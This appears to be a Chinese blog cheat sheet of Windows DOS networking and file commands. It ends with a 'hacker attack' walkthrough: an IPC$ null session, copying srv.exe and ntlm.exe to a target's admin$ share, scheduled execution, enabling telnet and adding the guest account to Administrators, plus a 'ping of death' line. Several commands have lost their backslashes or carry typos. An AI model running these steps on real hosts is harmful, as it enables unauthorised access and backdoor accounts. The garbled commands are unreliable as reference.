• Windows 常见DOS命令


    1. 查看网络连接及路由状况

    netstat -a                 查看开启了哪些端口,常用netstat -an
    netstat -n                  查看端口的网络连接情况,常用netstat -an
    netstat -v                  查看正在进行的工作
    netstat -p 协议名      查看某协议使用情况(查看tcp/ip协议使用情况)    例:netstat -p tcq/ip
    netstat -s                  查看正在使用的所有协议使用情况

    nbtstat -A ip             查看对方最近登陆的用户名(对方136到139其中一个端口要打开)
    finger username @host    查看最近有哪些用户登陆

    ipconfig                    查看本地ip地址,参数“/all”显示全部配置信息
    ping ip(或域名)         向对方主机发送默认大小为32字节的数据,参数:“-l[空格]数据包大小”;“-n发送数据次数”;“-t”指一直ping。
    ping -t -l 65550 ip   死亡之ping(发送大于64K的文件并一直ping就成了死亡之ping)
    tracert -参数 ip         跟踪路由(数据包),参数:“-w数字”用于设置超时间隔。
    route print               显示出IP路由,将主要显示网络地址Network addres,子网掩码

    mem                        查看cpu使用情况
    tlist -t                       以树行列表显示进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)
    kill -F 进程名            加-F参数后强制结束某进程(为系统的附加工具,默认是没有安装的,在安装目录的Support/tools文件夹内)

     

    2. 建立网络连接(磁盘映射)与资源共享

    net use \ipipc$ " " /user:" "                    建立IPC空链接
    net use \ipipc$ "密码" /user:"用户名"      建立IPC非空链接
    net use h: \ipc$ "密码" /user:"用户名"     直接登陆后映射对方C:到本地为H:
    net use h: \ipc$                                       登陆后映射对方C:到本地为H:
    net use \ipipc$ /del                                删除IPC链接
    net use h: /del                                           删除映射对方到本地的为H:的映射

    net use i: "\ipsharefolder" "password" /user:"domainusername"   磁盘映射,将共享目录映射为本地磁盘i

    net user                                                    查看有哪些用户
    net user 帐户名                                          查看帐户的属性
    net user 用户名 密码 /add                     建立用户
    net user guest 12345                                用guest用户登陆后用将密码改为12345
    net user guest /active:yes                         激活guest用户
    net localgroup administrators 用户名 /add        把“用户”添加到管理员中使其具有管理员权限,注意:administrator后加s用复数

    net password 密码                                     更改系统登陆密码

    net time \目标ip                                       查看对方时间
    net time \目标ip /set                                设置本地计算机时间与“目标IP”主机的时间同步,加上参数/yes可取消确认信息

    net view                                                     查看本地局域网内开启了哪些共享
    net view \ip                                              查看对方局域网内开启了哪些共享

    net share                                                   查看本地开启的共享
    net share ipc$                                           开启ipc$共享
    net share ipc$ /del                                    删除ipc$共享
    net share c$ /del                                       删除C:共享

    telnet ip                                                    端口 远和登陆服务器,默认端口为23 
    open ip                                                     连接到IP(属telnet登陆后的命令) 
    telnet                                                        在本机上直接键入telnet 将进入本机的telnet

    tftp -i 对方IP put c:srv.exe                       登陆后,上传本地c:server.exe至主机
    tftp -i 自己IP get srv.exe c:srv.exe           登陆后,将"IP"的srv.exe下载到目标主机c:srv.exe
                                                              参数:-i指以二进制模式传送,如传送exe文件时用,如不加-i 则以ASCII模式(传送文本文件模式)进行传送
    ftp ip 端口                                                用于上传文件至服务器或进行文件操作,默认端口为21。
                                                                     参数: bin指用二进制方式传送(可执行文件进);默认为ASCII格式传送(文本文件时)

    3. 文件操作

    xcopy 要复制的文件或目录树 目标地址目录名      复制文件和目录树,用参数/Y将不提示覆盖相同文件
    copy 路径文件名1 路径文件名2 /y                      复制文件1到指定的目录为文件2,用参数/y表示确认
    copy c:srv.exe \ipadmin$                                   复制本地c:srv.exe到对方的admin下
    copy \ipadmin$srv.exe c:                                  复制对方admini$共享下的srv.exe文件至本地C:
    cppy 1.jpg/b+2.txt/a 3.jpg                                     将2.txt的内容藏身到1.jpg中生成3.jpg新的文件
                                                                               注:2.txt文件头要空三排,参数:/b指二进制文件,/a指ASCLL格式文件

    replace 源文件                                                      要替换文件的目录 替换文件
    move 要移动的盘符路径文件名 移动后的路径文件名              移动文件,用参数/y将取消确认移动目录存在相同文件的提示就直接覆盖
    del /S /Q 目录 或 rmdir /s /Q                                 删除目录及目录下的所有子目录和文件。同时使用参数/Q 可取消删除操作时的系统确认就直接删除。
    del -F 文件名                            加-F参数后就可删除只读文件
                                      /AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件
                                     /A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档以外的文件。
                                     例如“DEL/AR *.*”表示删除当前目录下所有只读文件,“DEL/A-S *.*”表示删除当前目录下除系统文件以外的所有文件

    md 目录名                                创建目录
    dir                                            查看文件
                                                    参数:/Q显示文件及目录属系统哪个用户,/T:C显示文件创建时间,/T:A显示文件上次被访问时间,/T:W上次被修改时间
    tree                                          以树形结构显示出目录,用参数-f 将列出第个文件夹中文件名称
    ren     原文件名 新文件名          重命名文件名
    type   文件名                            显示文本文件的内容
    more 文件名                             逐屏显示输出文件
    find   文件名                             查找某文件

    fc 1.txt 2.txt>3.txt                    对比二个文件并把不同之处输出到3.txt文件中,"> "和"> >" 是重定向命令
    echo hello>d:1.txt ;                写入文本到指定文件(如果文件存在则替换)
    findstr "hello" 1.txt                  在1.txt文件中寻找字符串hello

     

    场景一、杀掉占用指定端口的进程

      1)查看指定端口占用情况:  netstat -ano|findstr "8080"          TCP    127.0.0.1:8080         0.0.0.0:0              LISTENING       10844

      2)查看PID对应进程:          tasklist|findstr "10844"                 java.exe                     10844 Console                    1    486,664 K

           3)结束该进程:                   taskkill /f /t /im java.exe

    场景二、黑客攻击

      Telnet协议是TCP/IP协议族中的一员,是Internet远程登陆服务的标准协议和主要方式。它为用户提供了在本地计算机上完成远程主机工作的能力。一旦入侵者与远程主机建立了Telnet连接,入侵者便可以使用目标主机上的软、硬件资源。
      IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,远程管理和查看计算机的共享资源。对方机器必须开了ipc$共享,否则你是连接不上的,连接成功后可通过139,445端口实现对共享文件/打印机的访问。由于Telnet服务默认是关闭的,可以在IPC连接成功后启动Telnet服务。

      1)连接对方主机:                                   net use \127.0.0.1ipc$ "" /user:"admintitrators" 

      2)在对方主机中运行程序

      复制文件到对方主机:                       copy srv.exe \127.0.0.1admin$     (这里的admin$指C:WINNTSystem32)
      查看时间:                                        net time \127.0.0.1 当前时间为:11:00
      用at命令启动srv.exe:                       at \127.0.0.1 11:05 srv.exe

      3)使用telnet远程登录对方主机

    复制ntlm.exe到对方主机:                copy ntlm.exe \127.0.0.1admin$
    进入admin目录执行ntlm程序:         ntlm
    打开对方telnet服务:                        net start telnet
    使用telnet登录对方机器:     telnet 127.0.0.1

      4)修改guest 用户权限

    激活guest 用户: net user guest /active:yes
    修改guest 用户密码: net user guest 123456
    将guest 用户加入Administrator组: net localgroup Administrators guest /add

      5)退出连接:                                          net use \127.0.0.1ipc$ /del

     常见错误号:

    错误号5,拒绝访问:很可能你使用的用户不是管理员权限的,先提升权限; 
    错误号51,Windows无法找到网络路径:网络有问题; 
    错误号53,找不到网络路径:ip地址错误;目标未开机;目标lanmanserver服务未启动;目标有防火墙(端口过滤); 
    错误号67,找不到网络名:你的lanmanworkstation服务未启动或者目标删除了ipc$; 
    错误号1219,提供的凭据与已存在的凭据集冲突:你已经和对方建立了一个ipc$,请删除再连; 
    错误号1326,未知的用户名或错误密码:原因很明显了; 
    错误号1792,试图登录,但是网络登录服务没有启动:目标NetLogon服务未启动; 
    错误号2242,此用户的密码已经过期:目标有帐号策略,强制定期要求更改密码

    参考原文:   http://www.cnblogs.com/lhws/p/4024208.html
          http://www.cnblogs.com/chinahbzm/articles/1423875.html

  • 相关阅读:
    【数据库】事务,ACID,CAP和一致性
    线程,进程。多进程,多线程。并发,并行的区别
    mysql 集群 数据同步
    如何读取一个表的表类型,以及读取一个表中字段的类型.
    网络攻击技术开篇——SQL Injection
    MySQL数据库作发布系统的存储,一天五万条以上的增量,预计运维三年,怎么优化?
    程序员找工作那些事(一)幸存者偏差
    程序员
    preg_replace的一些细节
    HDU 1258 Sum It Up(dfs 巧妙去重)
  • 原文地址:https://www.cnblogs.com/anxiao/p/6860559.html
Copyright © 2020-2023  润新知